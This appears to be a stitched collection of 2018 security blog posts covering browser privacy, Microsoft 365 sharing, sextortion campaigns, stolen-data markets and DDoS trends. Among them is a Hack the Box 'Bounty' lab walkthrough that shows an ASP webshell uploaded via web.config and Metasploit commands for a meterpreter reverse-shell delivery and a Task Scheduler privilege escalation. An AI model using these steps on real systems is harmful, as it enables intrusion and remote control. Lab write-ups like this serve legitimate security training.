  • Mozilla (Firefox), Google (Chrome), Apple (Safari), and Microsoft (Edge and Internet Explorer) have announced to drop support for the TLS (Transport Layer Security) 1.0 and 1.1 encryption protocols in early 2020. This will force websites to start using the newer and more secure protocols.
  • WebRTC leaks and vulnerabilities were solved. Real-time communication features could expose your true IP address via STUN requests with Firefox, Chrome, Opera and Brave browsers, even when you were using a VPN.

In earlier stages of privacy and security audits, all the major browsers had already added options and features like URL filtering, download protection, “do not track” capabilities, and measures against browlocks. They are not all using the same methods, and some are more effective than others, but the efforts were made nonetheless.

Remaining problems

Despite all the attempts to apply some pest-control on adware, malicious cryptominers, and other assorted browser hijackers, there will always be those that manage to slither through and infect users. And that doesn’t even take into account the multitude of potentially unwanted programs (PUPs) that most parties don’t even seem to care about at all. However, readers of this blog will undoubtedly know the way to our Malwarebytes products page, where they can download a cure for an infected browser.

Besides the obvious ramifications of an adware, PUP, or hijacker infection, there is still more work left to do to for those of us that value our online privacy.

Browser privacy

The upside of being able to use browser extensions is that there are many good ones out there that can help you establish a more private browsing experience. Ad-blockers, anti-tracking tools, and protective extensions add further protection.

You can also tighten your privacy by using a Virtual Private Network (VPN) to anonymize your traffic. You have options here, since you can install a VPN to anonymize all your Internet traffic, or you can install a VPN extension that will do so for your browser only. Since a VPN slows down the Internet connection, the choice will be based on which other Internet connections you use and your personal preference.

You could even decide to use one browser with a VPN extension and another without one. Personally, I use different browsers for different purposes. This is called compartmentalization and it allows you to visit trusted (and preferably bookmarked) websites with a quick browser and do your regular surfing with a fully protected and anonymized browser.

Besides using a VPN, you can also look at some alternative browsers that are already optimized for privacy and security:

  • The TOR software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world.
  • Freenet is a peer-to-peer platform for censorship-resistant communication and publishing that is available for Windows, macOs, and Linux.
  • Waterfox is a secure and private browser based on Firefox, that allows you to use Firefox extensions. It is available for Windows, macOS, Linux, and Android.
  • Pale Moon is another Mozilla fork, but it doesn’t work with all Firefox extensions. It is available for Windows and Linux.
  • Brave is a Chromium-based browser that blocks unwanted content by default and does not need much tinkering to keep you safe and private. Brave is available for Windows, macOs, Linux, iOS, and Android.

Anonymous searching

We have talked about (not so) private search extensions before, but I want to mention a search engine that does deliver on the promised private searches, and that was brought up in the comments to that blogpost (thanks Patrick). It is called DuckDuckGo, and you can perform searches directly from their site or you can install their app or extension.

Test to see whether your browser is safe against fingerprinting

Browser fingerprinting is a method used by commercial websites to uniquely identify visitors based on the way you have configured your browser and some other metrics that they can fetch from your browser, such as timezone.

If you feel you have already done your best to make your browser untrackable, pay this site a visit: It provides visitors with an option to do a test and analyze how well their browser and add-ons protect them against online tracking techniques. The site will also be able to see if your system is uniquely configured and therefor identifiable, even if you are using privacy-protective software.

Don’t get hung up on the test result alone though, because the number of results you are compared with plays a big role in the outcome. For example, coming from a small country or language area may give you away when no one else from that area has taken the test. This doesn’t automatically mean advertisers will be able to track you as well. Do pay attention to the specified fingerprinting results. You can access those by clicking on the fingerprinting link in the Test column.


Blocking advertisements

As we have explained in the blogpost Everybody and their mother is blocking ads, so why aren’t you?, blocking advertisements provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information.


Cookies are another topic that we have discussed earlier. Most cookies are not worth worrying about, but it is a good idea to be aware of them. How could you not be aware with every site asking your permission, right? In the blogpost Cookies: Should I worry about them?, we have explained how you can check and control the cookies that you want to allow.

Level of concern

So, while many major browsers are doing their best to keep you secure and private, it depends on your own level of concern how far you want to take this journey. There are specialized browsers, extensions, search engines, and other tools to help you achieve any level of privacy. Most people will be satisfied by customizing their mainstream browser to fit their needs, while others wouldn’t think of going online unless they are using Tor behind a VPN. To each their own. As long as you are aware of the risks. And we hope this post will help you to achieve the level you are after.

Stay safe, everyone!

The post How to tighten security and increase privacy on your browser appeared first on Malwarebytes Labs.

How to share content easily and securely

This is the seventh post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Cumbersome restrictions and limitations on mobile devices, apps, and remote access can be taxing from an IT perspective and frustrating for your employees. Your users need to be able to create, access, and share files from anywhere, and IT needs to ensure that these actions wont compromise your companys security.

Microsoft 365 offers security solutions that help secure your collaboration and productivity apps. That way your employees can connect and communicate wherever they are, using tools they are familiar with, as securely as if they were right at their desks.

How can I securely share documents outside my organization?

Classify documents based on content sensitivity

First, classify documents using Azure Information Protection (AIP). With AIP, you can configure policies to classify, label, and protect data based on its sensitivity. Data can be classified according to standards you define for content, context, and source. These classifications can then be applied automatically or manually, or you can prompt your employees to decide what classification to apply with in-product suggestions.

To classify documents using AIP, you must first configure your companys classification policy. Configure the policy by signing in to the Azure portal as an administrator and then select Azure Information Protection in the apps list. All AIP users start with a default policy that you can configure to suit your needs. Once you have created the policy that works best, publish your changes to deploy the policy to all managed apps and devices.

Use email to share files

Your employees can use email file attachments in Microsoft Outlook to share files. With Outlook, users can take files from their business or personal device, attach files to an email, and access a dedicated library where all group files are stored. If your employees need to send a sensitive message to external users, they can increase security by encrypting the message using Office 365 Message Encryption and the message recipient will decrypt the message using the Office 365 Message Encryption viewer.

Enable users to collaborate

To ensure that shared documents are only viewed by the right person, your users can share files with internal or external partners through OneDrive for Business and apply security features such as password protection and Multi-Factor Authentication.

Microsoft Teamsa chat-based workspaceenables teams to be more productive by giving them a single and secure location that brings together everything a team needs all in one hub, including chats, meetings, calls, files, and tools. Azure Active Directory (Azure AD) conditional access policies can be configured to secure the data in Teams. You can deploy Teams through Microsoft System Center Configuration Manager (ConfigMgr) or Microsoft Intune.

Yammer helps your users improve engagement with everyone in your organization through social networking. Use the security features in Yammer to help protect sensitive organizational data. Yammer supports Azure AD single sign-on authentication, allows admins to set password policies, and provides admins with session management tools that let you see the devices users are signed in to. You can manage access and permissions in Yammer by setting up the Yammer network to comply with your organizations standards.

Identify risky applications and shadow IT

Microsoft Cloud App Security allows you to more securely share documents via third-party applications by identifying the cloud apps on your network. By gaining visibility into shadow IT, you can help protect your information using policies for data sharing and data loss prevention.

How can I work on documents across devices securely?

To work more securely across different devices you will need to manage your mobile devices and set app protection policies. You can use Intune to manage your users mobile devices. To help prevent data loss, you will want to protect company data that is accessed from devices that you dont manage. You can apply Intune app protection policies that restrict access to company resources and avoid company and personal data from getting intermingled. Company data can end up in locations like personal storage or transferred to apps beyond your purview and result in data loss. App protection policies can be used to prevent company data from saving to the local storage of an unmanaged device or moving the data to other apps that aren’t protected by app protection policies.

Deployment tips from our experts

Enable security features in Office 365 appsOffice 365 apps like Outlook, OneDrive, Teams, and Yammer all come with built-in features that enable users to more securely share files and be productive. A few simple things you can do include:

Classify and share documents securelyClassify documents in AIP to track and control how information is used. Then share documents securely via third-party applications using Microsoft Cloud App Security to protect your information.

Prevent data loss on mobile devicesManage mobile devices with Intune and through mobile device management. Then implement app-level controls with Intune app protection policies to help prevent data loss.

Plan for success with Microsoft FastTrackFastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Store and share files inside and outside your organization to work securely across organizational boundaries. You can find additional security resources on

Coming Soon! Using controls for security compliance will be the last installment of our Deploying intelligent scenarios series. In November, we will kick off a new series: Top 10 security deployment actions with Microsoft 365 Security.

More blog posts from this series:

The post How to share content easily and securely appeared first on Microsoft Secure.

Hack the Box: Bounty Walkthrough

Today we are going to solve another CTF challenge “Bounty”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Bounty is


Let’s start off with our basic nmap command to find out the open ports and services.

nmap –A

Things to be observers from its result are port 80 is open for http and Microsoft-IIS/7.5 is service banner.

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

Since we didn’t get any remarkable clue from the home page, therefore, we have opted Dirbuster tool for directory enumeration thus execute the following, here we had used directory-list-2.3-medium.txt directory for web directory enumeration.

Hmm!! Here I received HTTP response for /transfer.aspx file and /uploadedFiles directories.

When we have explored in the browser and further welcomed by following web Page given below. The following web page lets you upload a file.

We try have many attempts to upload a file but every time we get a message “Invalid File. Please try again”.

 After so many efforts, I found this link on googling “IIS 7.5 rce upload”. Here we read about the web.config file, which plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in Apache web server. Uploading a .htaccess file to bypass protections around the uploaded files is a known technique.

So with the help of above given link we create an asp file to run web.config which will response by adding 1 and 2.

As you can observe, our web.config file is successfully uploaded inside /uploadedfiles/ directory.

So we have executed this file, it has given the expected response “3” which is sum of 1 and 2. Hence now we can inject malicious code in this file which can create RCE vulnerability through it.

Luckily!! I found this link: link for ASP webshell . So I copied the whole content of asp webshell in our web.config file and upload it.

On executing updated web.config file, it creates a form where we can run command as RCE. Once such surface you can run any malicious command to exploit RCE. Here we will be executing powershell code generated via web delivery module of metasploit.

msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost
msf exploit(multi/script/web_delivery) run

Past the highlighted code given in the image mstasploit inside the text file and run this code to get meterpreter session.

Great!! We have successfully got meterpreter session of the victim’s machine, now let’s find out the user.txt file to finish this task.

We successfully found user.txt file inside /users/merlin/Desktop. Next we need to find out root.txt file to finish this challenge and as we know for that we need to escalated root privilege.

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with first option as highlighted in the image.

This Vulnerability in Task Scheduler could allow elevation of privileges. This module has been tested on vulnerable builds of Windows Vista , Windows 7 , Windows Server 2008 x64 and x86.

use exploit/windows/local/ms10_092_schelevator
msf post(windows/local/ms10_092_schelevator) > set lhost
msf post(windows/local/ms10_092_schelevator) > set lport 5555
msf post(windows/local/ms10_092_schelevator) > set session 1
msf post(windows/local/ms10_092_schelevator) > exploit

Another Meterpreter session gets opened, once the selected exploit has been executed.


As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

Successfully we have found the root.txt from the path: C:\Users\Administrator \Desktop.

Wonderful!! We had completed the both tasks and hacked this box.

Happy Hacking!!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box: Bounty Walkthrough appeared first on Hacking Articles.

Website Security Tips for Marketers

Website Security Tips for Marketers

In our previous post, we have discussed why marketers should have a proactive approach to website security. Today we are going to discuss some security tips marketers can put into practice. In the simplest terms, website security means three things here at Sucuri:

  • Protecting your website from compromises.
  • Monitoring for issues so you can react quickly.
  • Having a documented emergency response plan.

Marketers should champion these initiatives so they can be prioritized by their business development team.

Continue reading Website Security Tips for Marketers at Sucuri Blog.

Anatomy of a sextortion scam

This blog was written by Jaeson Schultz.

Since this July, attackers are increasingly spreading sextortion-type attacks across the internet. Cisco Talos has been investigating these campaigns over the past few months. In many cases the spammers harvested email addresses and passwords from a publicly available data breach, and then used this data to facilitate their sextortion attacks. While the attackers do not actually have any compromising videos showing the victim, the emails claim to have explicit videos that they will distribute if the victim doesn't pay the extortion payment by a certain time. By including the recipient's password along with their demands for payment, the attackers hope to legitimize their claims about having compromising material concerning the victim. While these attacks have been in the wild for months, Talos wanted to take a closer look at some of these campaigns to see why users were being tricked into sending the attackers large amounts of bitcoin despite the attackers' empty threats. By examining some of the sextortion spam campaigns in detail, our researchers were able to gain insight into how these criminals operate.

An example of a sextortion email containing slight changes to the wording of the message body.

Sextortion Campaign Analysis

To facilitate a deeper understanding of sextortion scams, Talos extracted and analyzed messages related to two very similar sextortion spam campaigns. The first spam campaign we analyzed began on Aug.30, 2018, and the second campaign began Oct. 5, 2018. Both campaigns are still active at the time of writing this blog.

Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days' worth of spam. Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}Smith@yahoo\.jp/
From =~ /Aaron@Smith\d{3}\.edu/

Campaign Totals

In total, SpamCop received 233,236 sextortion emails related to these "Aaron Smith" sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.

Number of sextortion emails received by SpamCop over time

The sending IPs are distributed among many countries, however roughly 50 percent of the sextortion messages come from only five countries: Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). If some of these countries seem familiar, that may be because India and Vietnam were previously identified as having exceedingly large numbers of machines that are infected with the Necurs botnet, a well-known distributor of many pieces of malware.

Distribution of sender IP addresses by country

Despite sending more than 233,000 email messages as part of these campaigns, the number of unique recipients was actually fairly low. Talos found only 15,826 distinct victim email addresses. This means that the attackers were sending an average of almost 15 sextortion spam messages per recipient. One unlucky victim from our dataset was contacted a staggering 354 times.

Payment demands

Each sextortion spam contains a payment demand. The payment requested by the attackers varies according to the specific campaign, but in this instance, it is a randomly generated number consisting of an integer between one and seven, followed by three zeros ($1,000 - $7,000). These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.

Cryptocurrency wallets

In addition to the payment demand, each sextortion message also contains a bitcoin (BTC) wallet address to receive the payment from the victim. In total, Talos identified 58,611 unique bitcoin wallet addresses associated with these two spam campaigns. This works out to an average of approximately four sextortion messages per bitcoin wallet. Out of the approximately 58,000 bitcoin wallets, only 83 wallets have positive balances. However, the balances in those 83 wallets add up to 23.3653711 bitcoins, the equivalent of $146,380.31. That isn't too bad considering the attackers have only been distributing this particular scam for roughly 60 days, and do not actually possess any compromising material concerning the victim.

If you look at the number of unique bitcoin wallets and unique victim email addresses seen over time, you can see that the attackers periodically inject their ongoing campaign with fresh data. The number of unique bitcoin wallets tends to peak and then reduce over time, until it peaks again, with another fresh batch of attacker-generated bitcoin wallets. The last major injection of fresh wallet addresses occurred on Oct. 9. The same can be seen regarding unique message recipients over time, with what appears to be a large injection of fresh recipients also occurring around Oct. 9.

Unique versus duplicate bitcoin wallets and recipient email addresses

Unfortunately, as we dug further into the individual bitcoin wallets possessing positive balances, we noticed some oddities regarding the wallet payment amounts. Several wallets had received transfers that fell well under the minimum $1,000 payment that was demanded as part of this specific campaign. The payment amounts were low enough to fall outside the realm of what could be logically explained as a result of fluctuations in the price of bitcoin.

Bitcoin wallet found in the Aaron Smith sextortion spam that contains far less than the minimum demand of $1,000.

Our researchers discovered that some of the wallets used in this attack were also being used in other attacks. The attackers were reusing some of their bitcoin wallet addresses across different spam campaigns.

In light of the attackers' bitcoin wallet reuse, Talos decided to expand our research to include all spam messages that mention "bitcoin," while also possessing a string of 26-35 characters resembling a bitcoin wallet address in the body of the email.

Attackers' use of personal information

One of the first related sextortion campaigns we discovered utilized the victim's telephone number instead of their data breach password. While a telephone number isn't nearly as private or confidential as a user's password, it is still arguably somewhat personal. By including the victim's telephone number, the attackers were hoping they could convince recipients that their sextortion scam was indeed real.

An example sextortion attack using victims' phone numbers

If you read the text closely, you will notice that much of the text in this email is virtually identical to the text contained in the "Aaron Smith" campaigns Talos analyzed previously, especially the text in the closing paragraph.

As a matter of fact, while searching SpamCop, we encountered a sample email message where the attackers appeared to have mistakenly disclosed their template containing the choose-your-own-adventure-style text variations for generating varied message bodies as part of their sextortion spam attack.

An example of a sextortion template message mistakenly emailed out by the attackers

Internationalized sextortion

Security researchers at IBM X-Force recently discovered a sextortion campaign that was purportedly sent through the Necurs' botnet infrastructure in late September 2018. Using the 20 bitcoin wallet indicators of compromise (IoCs) provided by IBM, Talos identified nearly 1,000 different sending IP addresses involved in transmitting both the "Aaron Smith" spam, as well the international sextortion spam that IBM X-Force associated with the Necurs botnet. The overlap in sending IP infrastructure indicates, with a reasonable degree of confidence, that the same spammers are behind both of these sextortion campaigns.

Besides the "7 different languages (ENG, GER, FRE, ITA, JPN, KOR, ARA)" of sextortion spam identified in the X-Force blog, Talos identified additional variations of a similar sextortion campaign in Czech, Spanish, Norwegian, Swedish and Finnish.

An example of a sextortion message in Spanish

Additional attack variations

There were other, similar forms of sextortion spam originating from some of the same Necurs-sending IP infrastructure. Below is an example of a sextortion spam email that is attempting to look like a support ticket. For extra authenticity, the message even includes text near the top of the body that reads: "Camera Ready, Notification: <date>."

An example of a sextortion email disguised as a "Ticket"

The attackers used that same exact bitcoin wallet in a completely different type of bitcoin-related email scam. The BTC wallet 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy located in the "Ticket" example above, also appears in an explicit video-for-bitcoin scam. In the sex video swindle, the attackers impersonate a young girl from the Russian Federation, and promise to send a custom explicit video in exchange for a deposit of $100 into the attackers' bitcoin wallet.

An example of an explicit video-for-bitcoin message containing a duplicate sextortion bitcoin wallet

Talos identified additional bitcoin wallets that overlapped, which revealed additional attacks, also likely perpetrated by the same group of spammers. For example, the bitcoin wallet 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 not only appears in the "Ticket"-type sextortion scam messages detailed above, but it also appears in a different scheme meant to extort bitcoin from recipients who may be cheating on their significant other. The spammers claim to have been following the victim, where they obtained photographic evidence concerning the recipient's purported infidelity.

An example of an illicit relationship extortion message

Other (unrelated?) attack variations

As we reviewed additional bitcoin-related spam from SpamCop, we came across several other types of social engineering attacks aimed at obtaining bitcoin payments.

In a clever twist on the "I-know-you-are-cheating" extortion example detailed above, attackers claim to have proof that the victim's partner is in fact cheating on them. While the wording of the text in the message feels somewhat familiar, it is dissimilar enough to other extortion attacks (by containing an attached QR code, for example) that it may in fact be the handiwork of a completely different group of attackers.

A variation of the extortion attack offering victims proof of their partner's infidelity

Talos also discovered messages related to a much more frightening and violent variety of extortion. In these messages, the attackers claim to have been paid to kill the recipient of the email. The hitmen claim to already have their transportation arranged, but since they have had a change of heart, they are now willing to sell information about who hired them to their potential victim. Again, the formula and wording the message sound quite similar to text we witnessed in multiple sextortion emails. Though we suspect it, Talos cannot say for certain that these violent extortion emails are in fact the work of the same attackers.

An example of a violent extortion message threatening to kill the recipient

Other examples of social engineering

There were some bitcoin-related spam campaigns we noticed that, while they had very little connecting them to the spam sent via the Necurs botnet, they represented creative attempts to coerce some victims through social engineering.

First, there was an attack targeting victims with a propensity to fall for get-rich-quick schemes. In this offer, recipients are encouraged to send bitcoin to a wallet address where their bitcoin will magically double in value within three hours' time. This bitcoin "doubler" claims to exploit an undisclosed "bug in the system." While the average user may be able to realize quickly this is a scam, some users who are not as educated on the concept of bitcoin may be susceptible to this type of spam.

An example of the bitcoin doubler email

Other bitcoin-related spam targets those who might be inclined to donate to charity. While easing the suffering of children affected by military aggression is a most admirable cause, we couldn't find anything in this message to indicate that this is a legitimate charitable organization.

An example of the questionable "Charitable Children's Fund" email

We also discovered a piece of spam that claims to be "positive junk mail." The body of the message reads, "You know those emails that keep circulating trying to extort you for bitcoin claiming they have compromised the camera in your computer and have embarrassing videos and photos that they plan to share with your friends and family?...This IS NOT one of those!"

An example of the bitcoin lottery spam

In the Q&A section near the bottom of this email the spammers write, "Q: How do we know this is legitimate? A: You don't. We can't actually post proof without exposing ourselves as well as the winner. Take it for what it's worth. We apologize but this is the best we can do."

If you're curious about how the whole Oct. 4 bitcoin lottery drawing turned out, note that there is only one transaction for the bitcoin wallet mentioned in the spam. That transaction happened back on Sept. 28 and was for $4.


Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users' email inboxes, many of them may not be educated enough to identify that it's a scam designed to make them give away their bitcoins. Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.

Indicators of compromise (IOC)

Here is a list of the 58,611 bitcoin wallets used by the attackers in the "Aaron Smith" sextortion spam.

Information security: How Hackers Leverage Stolen Data for Profit

Data theft is inarguably big business for hackers. This has been proven time and time again when big-name companies and their customers are involved in a data breach. As these instances appear to take place more often, and the number of stolen or compromised files continues to rise, it’s worth looking into exactly what hackers do with this information after they’ve put so much effort into stealing it.

While some data breaches involve low-hanging fruit – including default passwords and other sub-standard data protection measures – other attacks include increasingly sophisticated cybercriminal activity, backed by in-depth social engineering and research into potential targets. Thanks to these efforts, more than 2.6 billion records were stolen or compromised in 2017, a staggering 88 percent rise from the amount of data hackers made off with in 2016, according to Information Age.

But what takes place after a successful breach and data exfiltration? With all of this information in hand, where do hackers turn next to generate a profit?

Type of data dictates price, post-theft malicious activity

As Trend Micro research shows, the process that stolen data goes through after the initial breach depends largely upon the type of data and from what industry it was stolen.

Personally identifiable information (PII) can include a whole host of different elements and is stored by many brands to support customer accounts and personalization. Researchers discovered that once hackers bring this information to underground markets, it can be used to support identity fraud, the creation of counterfeit accounts, illicit money transfers, the launch of spam and phishing attacks, and even blackmail, extortion or hacktivism.

Let’s take a look at the ways in which other types of stolen data can be used once hackers gather it and bring it to underground marketplaces:

  • Financial data, including information tied to banking, billing and insurance activities, can be used for identity fraud, including fake tax returns and loan applications, to establish counterfeit payment cards, billing accounts or money transfers, and for blackmail or extortion. With the right details, hackers can even withdraw money directly from victims’ bank accounts.
  • Health care details, spanning hospital records, medical or insurance information and even data from medical wearables and other devices, can be sold or used to support fraudulent insurance claims, or for the fraudulent purchase of prescription drugs.
  • Payment card information, such as the card owner’s name, card number and expiration date can be used for fraudulent online purchases. As Trend Micro experts noted, when data of this kind is stolen and sold within underground hacker marketplaces, it can be even more dangerous to an individual’s identity than stolen financial data. The potential for negative impacts can be much greater with fraudulently used payment card information, particularly when that data is tied to a user’s credit card.
  • Account credentials, including the usernames and passwords, can be leveraged by hackers for fraudulent insurance claims, to buy prescriptions, to launch spam or phishing attacks, as well as for extortion or hacktivism, depending upon the account that is hacked.
  • Education information, encompassing items like students transcripts, other school records and enrollment data, can be used for identity fraud and fake student loan applications, as well as for blackmail or extortion.

One theft leads to another

A main motivation of hackers is to make off with as much stolen information as possible. This thought process is applied not only to data breaches of specific companies, but also of the data belonging to individual users as well.

“More than 2.6 billion records were stolen or compromised in 2017.”

Take stolen account credentials, for example. A hacker will often leverage a stolen username and password to support further malicious activity and data theft in the hopes of compromising even more personal information.

“Theft of user credentials might even be more dangerous than PII, as it essentially exposes the victim’s online accounts to potential malicious use,” Trend Micro researches pointed out. “Email is often used to verify credentials and store information from other accounts, and a compromised email account can lead to further instances of fraud and identity theft.”

In such instances, a hacker can utilize stolen account credentials to fraudulently access an individual’s email. This may provide the cybercriminal with an email that includes a credit card invoice, giving them even more information for theft, and even the potential to steal, use or sell the victim’s credit card details for further fraud.

What’s more, as Trend Micro researchers noted, certain types of data are often interrelated, and the theft of one set of data often means the compromise of another, connected set. With health care files, for instance, a health care provider may store not only a patient’s medical history, but also their payment information as well. In this way, a breach of the provider could result not only in the exposure of medical details, but patient financial information as well.

What is data worth on underground marketplaces?

As Trend Micro’s interactive infographic shows, there are several different underground marketplaces existing all over the world, and the amount of profit hackers are able to generate depends on where they sell stolen information and the type of details their haul includes.

Experian data fro 2018 shows how profits for certain types of data can quickly add up for hackers, including for assets like:

  • Online payment account credentials, worth up to $200
  • Credit or debit card information, worth up to $110
  • Diplomas, worth up to $400
  • Medical records, worth up to $1,000
  • Passports, worth up to $2,000

Hackers also engage in data bundling, where individual pieces of stolen information are linked and packaged together, and then sold in a premium bundle for a higher price. These more complete, fraudulent profiles can include an array of information, including a victim’s name, age, address, birth date, Social Security number, and other similar information.

Working to prevent data theft

As the profit totals hackers can generate from stolen data continues to rise, it’s imperative that businesses and individual users alike take the proper precautions to safeguard their sensitive information.

This includes replacing default security measures with more robust protections, including strong passwords and multi-factor authentication, where applicable. Organizations should also limit access to especially sensitive information and databases to only those authorized users that need to utilize this data.

User education can also be a considerable advantage in better preventing information left. Users that are aware of current threats and know not to click on suspicious links or open emails from unknown senders can represent an additional layer of security against unauthorized access and cybercriminal activity.

To find out more about how to improve data prevention efforts within your organization, connect with the experts at Trend Micro today.

The post Information security: How Hackers Leverage Stolen Data for Profit appeared first on .

10 Cyber Security Travel Tips to Protect Your Devices & Data

Cyber Security Travel Tips for Business & Leisure The holiday season is fast approaching, but hackers don’t take vacations. Whether you’re planning to go home for the holidays or travel for business on a regular basis, make sure to protect yourself from cyber crime with these cyber security travel tips. Cyber Security Travel Tip #1:… Read More

The post 10 Cyber Security Travel Tips to Protect Your Devices & Data appeared first on .

DDoS Attacks in Q3 2018

News Overview

The third quarter 2018 turned out relatively quiet in terms of DDoS attacks. “Relatively” because there were not very many high-level multi-day DDoS onslaughts on major resources. However, the capacities employed by cybercriminals keep growing year after year, while the total number of attacks shows no signs of decline.

The early July attack on Blizzard Entertainment has made some of this summer’s top headlines. servers were sent offline, preventing players from logging in and launching their games for almost three days. The responsibility was claimed by a group called PoodleCorp, which made an appearance on Twitter promising to leave the company alone if their message were retweeted 2,000 times or more. Soon after their condition was satisfied, Blizzard reported “having fixed the technical issues earlier experienced by players.”

Towards the end of July there followed a series of attacks on another game publisher – Ubisoft. As a result, players were having trouble logging on to their accounts and using the multiplayer mode. According to the company spokesmen, user data was not compromised. There were no reports as to the purpose of the action. The attackers might have had financial gains in mind or just protested against some of the recent updates made to the games.

One more attack deserving the epithet of ‘major’ was, for several days, plaguing the three largest poker websites in the English-speaking segment: America’s Card… Room, PokerStars and Partypoker. The victimized operators were forced to cancel some of their events, sparking resentment on the part of players, who thus lost major sums of money.

As always, there were also DDoS attacks almost certainly resulting from political tension. The six-minute long disruption of the Swedish Social Democratic Party’s website at the end of August has been a stark example of such an attack. Likewise, politics is believed to have driven a similar attack on the website of a Democratic congressional candidate in California, which followed a month later. The tag of ‘political’ is also likely deserved by the activism-inspired (or rather environmental) motives which had fuelled the attack on the German RWE: by hitting their website the activists were trying to draw public attention to the impending clearing of the Hambach forest.

One way or another, the general public is still at a loss as to what had caused the affliction of the Ministry of Labor of the Republic of South Africa (the attack on its web resource took place in early September and, according to the Ministry spokesman, no internal systems or data were compromised). There is equal uncertainty as to the motives behind the attacks on the governmental service DigiD in Netherlands: at the end of July it was attacked thrice within one week, leaving many citizens unable to access its taxation-related and other features. Again, no data leaks were reported.

There are not many updates to the DDoS attackers’ toolset; although some curious new techniques and a couple of fresh vulnerabilities did get within sight of the experts. Thus, on July 20, they detected a mass “recruiting campaign” targeting D-Link routers, which used over 3,000 IPs and just one command server. The exploit was not very successful in corporate environments; yet it is still to be seen whether it was able to create a new botnet of user routers (and how big at that).

Speaking of “ready” or almost ready Trojans, reports began to circulate at the end of July about the newly devised Trojan Death, which builds its botnet by recruiting surveillance cameras. The handiwork of the notorious hacker Elit1Lands, this malware uses the AVTech vulnerability, made public back in October 2016. Security researcher Ankit Anubhav has managed to contact the cybercriminal and learn that so far the botnet has not been used for mass DDoS attacks; yet the author has great expectations about it, especially as Death turned out equally suitable for spam mailouts and spying.

In addition, in late August and early September, the security specialists first saw the new versions of Mirai and Gafgyt botnets exploiting the vulnerabilities in SonicWall and Apache Struts (in the last case, the same bug associated with the massive data breach at the credit reference bureau Equifax).

Meanwhile, the three authors of the original version of Mirai, who had made it publically available, finally got their court sentence. An Alaskan federal court ordered Paras Jha, Josiah White and Dalton Norman to pay considerable restitutions and serve 2,500 hours of community service. In all appearance, they will work on behalf of FBI, and the actual mildness of the sentence was due to the fact that during the process the three subjects had duly collaborated with the federal investigators: according to court documents, the three men have already accumulated more than 1,000 hours of community service by lending their expertise to at least a dozen investigations.

In addition, the British police arrested one of the intruders behind the DDoS attack on ProtonMail, mentioned in our last report. The 19-year-old rookie hacker turned out a British citizen, also involved in making hoax bomb threats to schools, colleges and airlines. His parents insist that he was “groomed” by “serious people” online through playing the game Minecraft. This story will hardly end with the young prodigy’s employment, although he does face possible extradition to the US: according to the investigation, his exposure was mainly due to the fact that he did not practice very good operational security.

Compared to Q3 of last year, the number of DDoS attacks slightly increased due to September, while in the summer and throughout the year, there was a noticeable drop in the number of DDoS attacks.

Quarterly number of DDoS- attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% is the number of attacks in 2017) (download)

The graph above shows that the slight increase from last year is owed to September, which accounts for the lion’s share of all attacks (about 5 times more compared to 2017). July and August, quite the opposite, turned out quieter versus last year. In 2017, no such disproportion was observed.

DDoS attacks defeated by Kaspersky DDoS Protection in September in proportion to Q3 total in 2017 and 2018 (download)

DDoS upsurge exactly in September is a fairly common thing: the primary target, year after year, is the education system, attacks being directed at the web resources of schools, universities and testing centers. The attack on one of England’s leading schools – Edinburgh University, which began on September 12 and lasted for nearly 24 hours, made the biggest headlines this year.

The onsets of this sort are often blamed on enemies of state, but these allegations are unfounded, according to statistics. Thus, in the course of our private investigations we discovered that attacks mostly occur during term time and subside during vacations. The British non-profit organization Jisc got almost the same result: by collecting statistics about attacks on universities it learned that there were fewer attacks when students were on vacation. The same is true for daily out-of-class hours: the main DDoS disturbances are experienced by schools during the period from 9:00 AM to 4:00 PM.

